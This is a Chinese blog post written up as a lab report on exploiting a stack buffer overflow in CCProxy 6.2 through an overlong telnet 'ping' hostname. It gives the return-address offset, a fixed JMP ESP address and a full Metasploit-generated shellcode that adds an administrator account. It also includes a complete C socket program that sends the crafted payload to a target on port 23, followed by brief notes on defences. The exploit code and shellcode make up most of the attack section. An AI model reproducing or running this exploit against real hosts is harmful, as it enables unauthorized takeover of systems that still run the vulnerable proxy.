缓冲区溢出漏洞攻击演示实验(CProxy 6.2缓冲区溢出漏洞)

最新推荐文章于 2024-07-03 15:16:39 发布
最新推荐文章于 2024-07-03 15:16:39 发布
阅读量2.1k 收藏 3
点赞数 1
分类专栏: 网络编程

实验内容:

分析缓冲区溢出漏洞,利用CCProxy 6.2的这个缓冲区溢出漏洞,利用ping命令向其发送一个长的字符串,溢出局部变量,覆盖RET的位置,从而实现程序跳转到自己想要让其执行的程序上去。

  定位RET

  寻找跳转指令地址

  构造shellcode

  定位shellcode存放位置

  编写攻击程序

实验环境:

攻击主机:

系统环境:windows 7 32bit

攻击程序开发环境:vc++ 6.0

虚拟机:VMware Workstation

目标主机:

系统环境:windows xp sp3 (关闭DEP)

溢出对象:CCProxy6.2

调试工具:CDB

其他工具:ActivePerl

patternCreate.pl

patternOffset.pl

Metasploit

实验设计:

本实验的目标主要是分析缓冲区溢出漏洞,利用CCProxy 6.2的这个缓冲区溢出漏洞,利用ping命令向其发送一个长的字符串,溢出局部变量,覆盖RET的位置,从而实现程序跳转到自己想要让其执行的程序上去。

主要试验流程如下:


详细过程:

(1)首先,先确定目的主机IP地址以及ccproxy telnet服务的端口。


通过查看,确定目的主机IP地址192.168.220.128,ccproxy telnet使用端口23。

(2)下面分析漏洞:CCProxy在代理Telnet协议时,可以接受Ping命令。Ping命令格式:ping hostname\r\n当hostname的长度大于或者等于1010字节时,CCProxy 6.2会发生缓冲区溢出,导致程序崩溃。

因为windows xp sp3已经有数据缓冲溢出保护机制,所以要进行这个实验需要手动关闭DEP。运行->c:\boot.ini,打开boot文件进行编辑,将指定位置修改为关闭。


我们在目的主机运行ccproxy,然后尝试使用telnet连接ccproxy,验证连通性以及环境配置。

cmd下输入命令行:telnet 192.168.220.128

ping AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

终端提示“Host not found”,说明CCProxy正确地处理了这个畸形数据,仍工作正常。

当ping AAAA……(2000个A)时,

ccproxy崩溃,提示失去了跟主机的连接,这说明缓冲区溢出,导致崩溃。

我们使用CDB调试,查看详细信息:



我们发现,缓冲区溢出时,溢出的内容会将RET原来的内容覆盖(A对应41),这样当函数返回时,RET的值传给EIP寄存器(存放下条指令地址),设想,如果我们精心构造一个字符串,将RET用JMP ESP指令地址覆盖,函数返回时就会转而执行JMP ESP 指令,这时候我们再将ESP里面放入程序代码的shellcode,这样就会执行我们自己编写的程序,这就形成漏洞攻击。

于是,我们首先需要定位RET。

(3)定位RET。我们可以构造一串完全不重复的字符串,ping之后溢出,捕获异常,查看EIP内容,因为字符串不重复,所以EIP内容一定可以对应找到唯一的字符串,这样就可以计算出EIP内容在字符串中的相对偏移量。

我们通过patternCreate.pl生成2000个完全不重复字符串。


然后将生成的字符串ping给目标主机。CDB捕获异常,查看EIP


然后通过patternOffset.pl计算出相对偏移量。


也就是说应该将要覆盖RET对应的字符串放在整个字符串第1012开始的位置。

(4)寻找JMP ESP 指令地址。这里可以选用通用地址:0x7ffa4512。然后在CDB下验证一下是否正确。


(4)构造shellcode。也就是要构造函数返回时要执行的指令。可以通过metasploit来构造,这里构造一个在目标主机添加管理员账户的shellcode:

“\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49”

“\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36”

“\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34”

“\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41”

“\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54”

“\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57”

“\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38”

“\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48”

“\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c”

“\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e”

“\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58”

“\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44”

“\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58”

“\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43”

“\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47”

“\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a”

“\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b”

“\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43”

“\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37”

“\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49”

“\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56”

“\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46”

“\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36”

“\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36”

“\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44”

“\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52”

“\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56”

“\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56”

“\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57”

“\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52”

“\x41\x44\x46\x44\x46\x44\x42\x30\x5a”

(5)下面需要定位shellcode存放位置。像定位RET一样,ping生成的字符串,CDB捕获异常。不过这里注意,ESP指向的地址处的内容才是shellcode的内容,所以我们需要根据ESP内容来获取它指向的地址里面的内容A,然后定位A在字符串里的相对偏移,就是shellcode应该放置的位置。


(6)构造exploit。按照前面计算得出的相对偏移,将JMP ESP指令和shellcode放置在正确位置。

(7)编写攻击程序。采用C语言Socket编程,实现向目标主机发送ping字符串,完成攻击。

代码如下:

[cpp]  view plain  copy
  1. #include <stdio.h>  
  2.   
  3. #include <stdlib.h>  
  4.   
  5. #include <windows.h>  
  6.   
  7. #pragma comment (lib,”ws2_32″)  
  8.   
  9. //创建管理员用户shellcode  
  10.   
  11. char shellcode[] =  
  12.   
  13. “\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49”  
  14.   
  15. “\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36”  
  16.   
  17. “\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34”  
  18.   
  19. “\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41”  
  20.   
  21. “\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54”  
  22.   
  23. “\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57”  
  24.   
  25. “\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38”  
  26.   
  27. “\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48”  
  28.   
  29. “\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c”  
  30.   
  31. “\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e”  
  32.   
  33. “\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58”  
  34.   
  35. “\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44”  
  36.   
  37. “\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58”  
  38.   
  39. “\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43”  
  40.   
  41. “\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47”  
  42.   
  43. “\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a”  
  44.   
  45. “\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b”  
  46.   
  47. “\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43”  
  48.   
  49. “\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37”  
  50.   
  51. “\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49”  
  52.   
  53. “\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56”  
  54.   
  55. “\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46”  
  56.   
  57. “\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36”  
  58.   
  59. “\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36”  
  60.   
  61. “\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44”  
  62.   
  63. “\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52”  
  64.   
  65. “\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56”  
  66.   
  67. “\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56”  
  68.   
  69. “\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57”  
  70.   
  71. “\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52”  
  72.   
  73. “\x41\x44\x46\x44\x46\x44\x42\x30\x5a”;  
  74.   
  75. void main()  
  76.   
  77. {  
  78.   
  79. WSADATA WSAData;  
  80.   
  81. char Buff[2000],Recv[2000];  
  82.   
  83. int nRet,conRet;  
  84.   
  85. struct sockaddr_in ipAddress;  
  86.   
  87. SOCKET sockettest;  
  88.   
  89. if(WSAStartup(MAKEWORD(1,1),&WSAData)!=0)  
  90.   
  91. {  
  92.   
  93. printf(“ERROR\n”);  
  94.   
  95. WSACleanup();  
  96.   
  97. exit(1);  
  98.   
  99. }  
  100.   
  101. sockettest= socket(AF_INET,SOCK_STREAM,0);  
  102.   
  103. ipAddress.sin_family = AF_INET;  
  104.   
  105. ipAddress.sin_addr.s_addr = inet_addr(“192.168.220.128”);  
  106.   
  107. ipAddress.sin_port = htons(23);  
  108.   
  109. conRet=connect(sockettest,(struct sockaddr *)&ipAddress,sizeof(ipAddress));  
  110.   
  111. memset(Buff, 0x90, sizeof(Buff)-1); //全部NOP填充  
  112.   
  113. memcpy(&Buff[0],”ping “,5); //设置ping指令  
  114.   
  115. memcpy(&Buff[1998],”\r\n”,2); //设置结尾的\r\n  
  116.   
  117. memcpy(&Buff[1017],”\x12\x45\xfa\x7f”,4); //设置JMP ESP指令地址,定位1012,加上ping为1017  
  118.   
  119. memcpy(&Buff[9],shellcode,sizeof(shellcode)-1); // ping5个,加之后4个NOP  
  120.   
  121. memset(Recv,0x90,sizeof(Recv)); //初始化缓冲区  
  122.   
  123. recv(sockettest,Recv,sizeof(Recv),0);//目的主机存入缓冲区  
  124.   
  125. nRet=send(sockettest,Buff,sizeof(Buff),0);  
  126.   
  127. Sleep(1000);  
  128.   
  129. WSACleanup();  
  130.   
  131. printf(“attack ok !\n”);  
  132.   
  133. }  


(8)执行结果。

攻击执行前,系统只有一个管理员账户。

攻击之后,ccproxy崩溃,并且系统增加了一个管理员账户。

实验结论:

通过了一段时间的努力学习与实践运用,终于完成了这一次缓冲区溢出漏洞攻击实验。

在这次试验中通过ccproxy漏洞进行攻击,实现了在目标主机增加一个管理员账户。

实验体会:

通过分析漏洞,也思考了一些漏洞攻击的防范问题。整个防范措施大概有源码级保护方法、运行期保护方法、阻止攻击代码执行、加强系统保护等几种。对于源码保护,可以提高警惕,在编写程序时对于涉及缓冲区的部分进行严格的边界检查,防止溢出。也可以利用漏洞扫描工具对源码中可能存在缓冲区溢出漏洞的代码部分分析,寻找bug并解决。运行期保护主要研究如何在程序运行的过程中发现或阻止缓冲区溢出攻击。比如数组边界检查,检查数组实际长度是否超过了分配的长度,如果超过,立即进行相应的处理。阻止攻击代码执行,可以设定堆栈数据段不可执行,这样就可以避免被攻击。加强系统保护主要是保护系统信息、关闭不需要的服务、最小权限原则、使用系统的堆栈补丁、检查系统漏洞并及时为软件打上安全补丁等。

H-KING
关注
专栏目录
详解Nginx启用proxy_buffer缓冲
09-30
在Nginx中,proxy_buffer可以减少后端服务器的负载,因为Nginx会首先将接收到的数据存储在缓冲区中,然后在客户端需要时发送。在理想情况下,如果客户端的带宽和处理能力足够好,代理缓冲是不需要的,但通常情况下,...
【计算机系统】缓冲区溢出攻击实验
Alex_SCY的博客
07-28 1万+
github地址 一、 实验目标: 理解程序函数调用中参数传递机制; 掌握缓冲区溢出攻击方法; 进一步熟练掌握GDB调试工具和objdump反汇编工具。 二、实验环境: 计算机(Intel CPU) Linux 64位操作系统 GDB调试工具 objdump反汇编工具 三、实验内容 本实验设计为一个黑客利用缓冲区溢出技术进行攻击的游戏。我们仅给黑客(同学)提供一个二进制可执行文件bufbomb和部分函数的C代码,不提供每个关卡的源代码。程序运行中有3个关卡,每个关卡需要用户输入正确的缓冲区内容,.
CCProxy漏洞利用
最新发布
qq_67181251的博客
07-03 748
CCProxy是一款代理服务器软件,不仅支持常见的HTTP和SOCKETS代理,而且支持FTP和Telnet协议。我们这次的漏洞就是在Telnet服务当中的。首先,使用ping指令进行大量输入,判断是否会出现栈溢出的情况,如果出现说明存在栈溢出的漏洞,并且可以进行利用。使用kali通过telnet服务进行访问,ping指令后跟大量的重复字符。​​​​报错并且显示地址为0x61616161,说明确实存在缓冲区溢出漏洞,并且可以进行利用。
CVE漏洞攻击——ccproxy溢出
qq_43840665的博客
04-17 4500
CCProxy6.2溢出漏洞 虚拟机:VirtualBox 6.1.30 操作系统:WindowsXP SP2 主机OS:Microsoft Windows10 CVE编号:CVE-2004-2685 安装共享文件夹 按照下面箭头指向程序,然后再虚拟机设置中自动挂载一个主机的共享文件夹 2. 关闭winxp的DEP 使系统显示C:\boot.ini 修改DEP选项 查询虚拟机IP并连接ccproxy 命令提示符中输入ipconfig可以获得ip地址,或者使用127.0.0.1
缓冲区溢出漏洞攻击演示实验
Mr.Buffoon
10-07 9847
实验内容: 分析缓冲区溢出漏洞,利用CCProxy 6.2的这个缓冲区溢出漏洞,利用ping命令向其发送一个长的字符串,溢出局部变量,覆盖RET的位置,从而实现程序跳转到自己想要让其执行的程序上去。   定位RET   寻找跳转指令地址   构造shellcode   定位shellcode存放位置   编写攻击程序 实验环境: 攻击主机:
计算机组成原理 / 反汇编实验(3)缓冲区溢出攻击
ailbj的博客
12-21 1198
实验目的:加深对IA-32函数调用规则和栈结构的具体理解。实验目标:对一个可执行程序“bufbomb”实施一系列缓冲区溢出攻击实验要求:设法通过造成缓冲区溢出来改变该可执行程序的运行内存映像,继而执行一些原来程序中没有的行为,例如将给定的字节序列插入到其本不应出现的内存位置等。实验语言:c。实验环境:linux。
Apache 内容动态缓冲模块 mod_cache应用
01-10
mod_cache是apache中基于URI键的内容动态缓冲(内存或磁盘) 从Apache2.2起,mod_cache和mod_file_cache将不再是试验模块,它们已经足够稳定,可以用于实际生产中了。这些缓冲体系提供了一个强有力的途径来加速原始web...
Python脚本实现Web漏洞扫描工具
09-21
- **XSS漏洞**:即跨站脚本攻击,允许攻击者将恶意脚本注入到网页中,当其他用户浏览该页面时,脚本会在用户的浏览器上执行,进而窃取用户信息或进行其他恶意操作。 #### 三、使用说明 ##### 1. 运行环境 - **...
proxylab:系统编程实验室作业 #5
05-30
代理实验室系统编程实验室作业 #5 该目录包含 Echo Proxy Lab 所需的文件。 proxy.c、csapp.h、csapp.c 这些是启动文件。 csapp.c 和 csapp.h 在您的教科书中有所描述。 您可以对这些文件进行任何您喜欢的更改。 您...
【网络攻防技术】实验四——缓冲区溢出攻击实验
qq_45755706的博客
02-27 9256
一、实验题目 本实验的学习目标是让学生将从课堂上学到的有关缓冲区溢出漏洞的知识进行实践,从而获得有关该漏洞的第一手经验。缓冲区溢出是指程序试图将数据写入预先分配的固定长度缓冲区边界之外的情况。恶意用户可利用此漏洞改变程序的流控制,甚至执行任意代码。此漏洞是由于数据存储(如缓冲区)和控件存储(如返回地址)的混合造成的:数据部分的溢出会影响程序的控制流,因为溢出会改变返回地址。 本实验将提供四台不同的服务器,每台服务器运行一个带有缓冲区溢出漏洞程序实验任务是开发一个利用漏洞程序,并最终获得这些服务器上的r
针对CCProxy 6.2缓冲区溢出
flamingobaby的博客
04-15 1511
溢出对象:CCProxy 6.2 调试工具: WinDbg,pattern.py 实验环境: Windows XP sp1或sp2,kali Linux 漏洞说明: CCProxy在代理Telnet协议时,可以接受 Ping命令 。Ping命令格式:ping hostname\r\n 。 当hostname的长度大于或者等于1010字节时,CCProxy 6.2会发生缓冲区溢出,导致程序...
计算机系统基础实验缓冲区溢出攻击
catting的博客
04-21 8992
通过这次实验,学习到了缓冲区溢出的原理和机制,加深了对函数调用规则的理解,也加深了对栈帧结构的理解。课本上大致描述了栈保护机制,通过模拟缓冲区溢出攻击,了解了栈保护机制,也加深了对课本理论知识的理解。把理论付诸实践,提高了自己的动手能力。通过对这些原理的学习,也提醒我以后在自己编写代码的过程中,要避免写出类似的危险代码,避免不必要的损失。同时,我还学习到了程序运行时操作,了解了这种形式的安全性弱点的性质,以后编写代码时也要多加小心。
网络攻防-缓冲区溢出攻击实验
qq_64389397的博客
12-15 273
实验的学习目标是让学生将从课堂上学到的有关缓冲区溢出漏洞的知识进行实践,从而获得有关该漏洞的第一手经验。缓冲区溢出是指程序试图将数据写入预先分配的固定长度缓冲区边界之外的情况。恶意用户可利用此漏洞改变程序的流控制,甚至执行任意代码。此漏洞是由于数据存储(如缓冲区)和控件存储(如返回地址)的混合造成的:数据部分的溢出会影响程序的控制流,因为溢出会改变返回地址。本实验将提供四台不同的服务器,每台服务器运行一个带有缓冲区溢出漏洞程序实验任务是开发一个利用漏洞程序,并最终获得这些服务器上的root权限。
网络安全实验:CCProxy缓冲区溢出攻击
程哥哥的一亩三分地
04-17 6655
CCProxy缓冲区溢出实验 一.实验环境说明 溢出对象:CCProxy(一款代理服务器软件,支持FTP和Telnet) 调试工具:CDB、WinDbg、OllyDBG、IDA Pro etc 实验环境:VMware Workstation Pro、windows xp sp3(关闭dep)、python3、ActivePerl Windows XP SP3关闭DEP的方法:编辑C:\boot.ini文件,将/noexecute=optin 改为 /execute,重启系统 二.测试CCProxy是否存在
CCProxy 6.2 溢出分析
太阳风的专栏
11-01 2720
前天去上海比赛,有个CCProxy的溢出题目,当时现场没能调出来,回来后,发现其实是线程的栈空间分配的问题,也就是说:当用OD打开和用OD附加时,线程分配的堆栈地址是不一样的。关于线程的堆栈的关系,不清楚的同学可以网上搜搜资料。现在给出解题过程: 这个软件在网上有POC,大家可以去看看,或者用msf实验一遍: http://www.exploit-db.com/exploits/16689/
CSAPP:Attack Lab —— 缓冲区溢出攻击实验
热门推荐
-Silvia、
06-05 4万+
CSAPP:Attack Lab —— 缓冲区溢出攻击实验 X86-64寄存器和栈帧 Part I:Code Injection Attacks Part II:Return-Oriented Programming Attacks
CCPROXY漏洞利用
panfengblog
11-02 2136
CCPROXY漏洞利用 CCProxy是一款非常流行的下载量最大的的国产代理服务器软件,其CCProxy 6.2版本存在一个栈溢出漏洞,可以通过此漏洞进行shellcode攻击,以下是学习过程的一个小记录吧 : ) 1.找到并定位溢出点 使用ping命令加一个超长的字符串加一个主机名,代理端会返回Host not found。 当输入的字符串足够长时(比如2000个a),软件就会溢出奔溃,通过二分法尝试,发现ping后最多接1009个字符,第1010字符开始溢出,并且前四字节无用,如下图,当输入
网络攻防实验缓冲区溢出攻击
hxxjxw的博客
07-09 6793
这个实验是网络攻防课程实验中的一个,但是目前我还没有完全搞懂代码,以后有机会来补。也欢迎大佬指点 一、实验目的和要求 通过实验掌握缓冲区溢出的原理,通过使用缓冲区溢出攻击软件模拟入侵远程主机理解缓冲区溢出危害性,并理解防范和避免缓冲区溢出攻击的措施。 二、实验原理和实验环境 实验原理: 缓冲区溢出(Buffer Overflow)是目前非常普遍而且危...
nginx缓冲区配置
11-30
Nginx缓冲区配置可以通过以下几个指令进行设置: 1. proxy_request_buffering:设置是否开启请求缓冲,默认为on,表示开启缓冲。 2. proxy_buffer_size:设置代理服务器保存用户头信息的缓冲区大小,默认为4k。 3. proxy_buffers:设置代理服务器缓冲区,格式为proxy_buffers number size,其中number表示缓冲区个数,size表示每个缓冲区的大小,默认为8 4k。 4. proxy_busy_buffers_size:设置高负荷下缓冲大小,默认为8 8k。 5. proxy_temp_file_write_size:设定缓存文件夹大小,大于这个值,将从upstream服务器传,默认为8 8k。 例如,以下是一个Nginx缓冲区配置的例子: ``` proxy_request_buffering on; proxy_buffer_size 4k; proxy_buffers 4 32k; proxy_busy_buffers_size 64k; proxy_temp_file_write_size 64k; ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值